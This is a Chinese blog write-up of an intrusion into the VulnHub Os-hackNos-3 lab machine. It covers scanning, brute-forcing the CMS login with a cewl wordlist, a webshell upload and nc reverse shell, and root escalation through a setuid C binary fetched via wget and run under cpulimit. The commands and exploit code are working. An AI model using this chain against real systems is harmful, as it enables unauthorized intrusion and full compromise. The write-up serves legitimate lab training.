vulnhub靶机渗透[Os-hackNos-3]

Posted on Edited on In Views: Word count in article: 1.6k Reading time ≈ 6 mins.

(如果看不到图片,是因为github图床被墙了,准备梯子或者等一段时间就能看到图片了。)

发布日期

名称:hackNos:Os-hackNos-3
发布日期:2019年12月14日

下载

  • Download: https://drive.google.com/open?id=1zWTU6BFXPmS8BDeoVc766FwUJQZ4-_RT
  • Download (Mirror): https://download.vulnhub.com/hacknos/Os-hackNos-3.ova
  • Download (Torrent): https://download.vulnhub.com/hacknos/Os-hackNos-3.ova.torrent

描述

难度:中级
flag:2flag第一个user.txt和第二个root.txt
学习:Web应用程序 枚举 特权提升
网站:www.hacknos.com
联系我们:@rahul_gehlaut
使用VirtualBox而不是VMware可能会更好

起因

我想起来做这个靶机的原因是,暗月大佬说他自己搜遍全网无法提权,本人就苟且尝试着做了一下。。。:)

信息收集

上nmap

1
2
3
4
root@kali:~# nmap -sn -v 192.168.56.0/24
Nmap scan report for 192.168.56.105
Host is up (0.00022s latency).
MAC Address: 08:00:27:CF:65:22 (Oracle VirtualBox virtual NIC)
1
2
3
4
root@kali:~# nmap -p- -v -sV -Pn 192.168.56.105
PORT   STATE SERVICE VERSION
22/tcp open  ssh     OpenSSH 8.0p1 Ubuntu 6build1 (Ubuntu Linux; protocol 2.0)
80/tcp open  http    Apache httpd 2.4.41 ((Ubuntu))
1
2
3
4
5
6
7
8
9
10
11
12
root@kali:~# nmap -p 22,80 -Pn -sV -A -T5 -v --script=vuln 192.168.56.105
PORT   STATE SERVICE VERSION
22/tcp open  ssh     OpenSSH 8.0p1 Ubuntu 6build1 (Ubuntu Linux; protocol 2.0)
|_clamav-exec: ERROR: Script execution failed (use -d to debug)
80/tcp open  http    Apache httpd 2.4.41 ((Ubuntu))
|_clamav-exec: ERROR: Script execution failed (use -d to debug)
|_http-csrf: Couldn't find any CSRF vulnerabilities.
|_http-dombased-xss: Couldn't find any DOM based XSS.
| http-enum: 
|_  /scripts/: Potentially interesting directory w/ listing on 'apache/2.4.41 (ubuntu)'
|_http-server-header: Apache/2.4.41 (Ubuntu)
|_http-stored-xss: Couldn't find any stored XSS vulnerabilities.

没有太多有用信息,/scripts/目录下的文件显示是osticket搭建的邮件系统,dirb没有发现太多有效信息

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
root@kali:~# dirb http://192.168.56.105/

-----------------
DIRB v2.22    
By The Dark Raver
-----------------

START_TIME: Mon Dec 30 21:46:55 2019
URL_BASE: http://192.168.56.105/
WORDLIST_FILES: /usr/share/dirb/wordlists/common.txt

-----------------

GENERATED WORDS: 4612                                                          

---- Scanning URL: http://192.168.56.105/ ----
+ http://192.168.56.105/index.html (CODE:200|SIZE:195)                                                
==> DIRECTORY: http://192.168.56.105/scripts/                                                         
+ http://192.168.56.105/server-status (CODE:403|SIZE:279)

现在就上神器dirbuster了

电脑性能好,开500个线程无压力:)

发现两个敏感目录/websec, /devil其中只有/websec目录下的cms有用

爆破cms的后台密码

使用cewl爬取/websec/页面制作密码字典(靶机作者的提示)

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
root@kali:~# cewl http://192.168.56.105/websec/ > oshacknos3.txt
root@kali:~# cat oshacknos3.txt 
CeWL 5.4.6 (Exclusion) Robin Wood (robin@digi.ninja) (https://digi.ninja/)
hackNos
Bootstrap
and
com
Start
www
JavaScript
Navigation
About
Services
Portfolio
Contact
Security
Find
Out
More
Securityx
has
everything
you
need
get
your
new
website
running
time
All
the
templates
themes
are
open
source
free
download
easy
use
strings
attached
Get
Started
Your
Service
contact
hacknos
core
Plugin
Custom
scripts
for
this
template

用户名用contact@hacknos.com,爆破密码用hydra或者burp都可以,成功进入后台后,发现密码就是首页的Securityx

getshell

进入下图所示页面然后点开.htaccess文件,将里面的内容全部删除,然后点击save,不删除的话,后面上传的shell无法访问。

如下图成功上传冰蝎木马

直接连接然后上传php-reverse-shell.php,

kali端监听,然后访问shell,成功弹回shell

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
root@kali:~# nc -lvp 5566
listening on [any] 5566 ...
192.168.56.105: inverse host lookup failed: Host name lookup failure
connect to [192.168.56.102] from (UNKNOWN) [192.168.56.105] 53620
Linux hacknos 5.3.0-24-generic #26-Ubuntu SMP Thu Nov 14 01:33:18 UTC 2019 x86_64 x86_64 x86_64 GNU/Linux
 03:34:52 up  2:04,  0 users,  load average: 0.00, 0.00, 0.33
USER     TTY      FROM             LOGIN@   IDLE   JCPU   PCPU WHAT
uid=33(www-data) gid=33(www-data) groups=33(www-data)
/bin/sh: 0: can't access tty; job control turned off
$ id 
uid=33(www-data) gid=33(www-data) groups=33(www-data)
$ whoami
www-data
$ python3 -c 'import pty;pty.spawn("/bin/bash")'
www-data@hacknos:/$ id
id
uid=33(www-data) gid=33(www-data) groups=33(www-data)
www-data@hacknos:/$ whoami
whoami
www-data

提权

话说暗月大佬搜全网都无法提权的靶机,本人感到非常好奇,到底有多难呢?请接着往下看。

查看SUID权限可执行文件,没有可用的

1
2
3
4
5
6
7
8
9
10
11
12
13
14
www-data@hacknos:/$ find / -perm -u=s -type f 2>/dev/null
/usr/bin/mount
/usr/bin/passwd
/usr/bin/chfn
/usr/bin/newgrp
/usr/bin/cpulimit
/usr/bin/gpasswd
/usr/bin/umount
/usr/bin/su
/usr/bin/sudo
/usr/bin/fusermount
/usr/bin/at
/usr/bin/pkexec
/usr/bin/chsh

gtfobins搜索了以下可利用提权的cpulimit二进制文件.

1
2
3
www-data@hacknos:/$ sudo cpulimit -l 100 -f /bin/sh
sudo cpulimit -l 100 -f /bin/sh
[sudo] password for www-data:

失败。。。然后尝试了各种exp和poc和脚本,还有其他提权方式均失败之后,实在没办法找到了作者,问了作者

作者的意思是通过docker提权,参考他的博客docker Privilege Escalation Linux

然而,我按照文中的方法试了,还是提示当前用户www-data的权限不足,然后查看了blackdevil用户的权限,具有docker的权限

然而,后面我花了很多时间尝试爆破blackdevil的密码,尝试在shell中找hash值,无果。。。再次问作者,也没有回复。

所以只好在discord上面询问vulnhub的大神,有幸得到了pwn4magic大佬的回复

他告诉我先在kali上面写好C语言的脚本,然后编译,然后将生成的程序放到目标机上面给777权限,然后和cpulimit一起运行就行了,具体做法如下。

c语言程序源码:

1
2
3
4
5
6
7
8
9
10
11
#include<stdio.h>
#include<unistd.h>
#include<sys/types.h>

int main()
{
  setuid(0);
  setgid(0);
  system("/bin/bash");
  return 0;
}

编译之后,放到目标机上

1
2
3
4
5
6
7
root@kali:~# gcc luci11.c -o exp
luci11.c: In function ‘main’:
luci11.c:9:3: warning: implicit declaration of function ‘system’ [-Wimplicit-function-declaration]
    9 |   system("/bin/bash");
      |   ^~~~~~
root@kali:~# python -m SimpleHTTPServer
Serving HTTP on 0.0.0.0 port 8000 ...
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
www-data@hacknos:/tmp$ wget http://192.168.56.102:8000/exp
wget http://192.168.56.102:8000/exp
--2019-12-31 05:37:05--  http://192.168.56.102:8000/exp
Connecting to 192.168.56.102:8000... connected.
HTTP request sent, awaiting response... 200 OK
Length: 16720 (16K) [application/octet-stream]
Saving to: ‘exp’

exp                 100%[===================>]  16.33K  --.-KB/s    in 0s      

2019-12-31 05:37:05 (130 MB/s) - ‘exp’ saved [16720/16720]

www-data@hacknos:/tmp$ chmod 777 exp
chmod 777 exp
www-data@hacknos:/tmp$ ls -la
ls -la
total 28
drwxrwxrwt  2 root     root      4096 Dec 31 05:37 .
drwxr-xr-x 20 root     root      4096 Dec 10 18:05 ..
-rwxrwxrwx  1 www-data www-data 16720 Dec 31  2019 exp

最后运行下面命令提权

1
2
3
4
5
6
7
8
9
www-data@hacknos:/tmp$ cpulimit -l 100 -f ./exp
cpulimit -l 100 -f ./exp
Process 2800 detected
root@hacknos:/tmp# id 
id
uid=0(root) gid=0(root) groups=0(root),33(www-data)
root@hacknos:/tmp# whoami
whoami
root

成功提权,简直帅炸天。。。
得到flag,root.txt。。。。

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
root@hacknos:/tmp# cd /root
cd /root
root@hacknos:/root# ls
ls
root.txt  snap
root@hacknos:/root# cat root.txt
cat root.txt
########    #####     #####   ########         ########  
##     ##  ##   ##   ##   ##     ##            ##     ## 
##     ## ##     ## ##     ##    ##            ##     ## 
########  ##     ## ##     ##    ##            ########  
##   ##   ##     ## ##     ##    ##            ##   ##   
##    ##   ##   ##   ##   ##     ##            ##    ##  
##     ##   #####     #####      ##    ####### ##     ##


MD5-HASH: bae11ce4f67af91fa58576c1da2aad4b

Author: Rahul Gehlaut

Blog: www.hackNos.com

Linkedin: https://in.linkedin.com/in/rahulgehlaut

至此,挑战完成。。。
全网首发,发布日期(2019年12月31)

  • eg: linux suid提权参考Linux Privilege Escalation using SUID Binaries,保姆级教程。

  • 最后附上oshacknos3靶机作者Rahul Gehlaut的write upOS-hackNos-3 Walkthrough Vulnhub CTF,其实能进入blackdevil账户的话,还可以使用之前文章中提到的docker提权方式。

Game over

不好意思,这次还是没有找到希腊某位大佬的傻瓜式一键通关脚本,i am so sorry about this…It’s a pity…

The end,to be continue…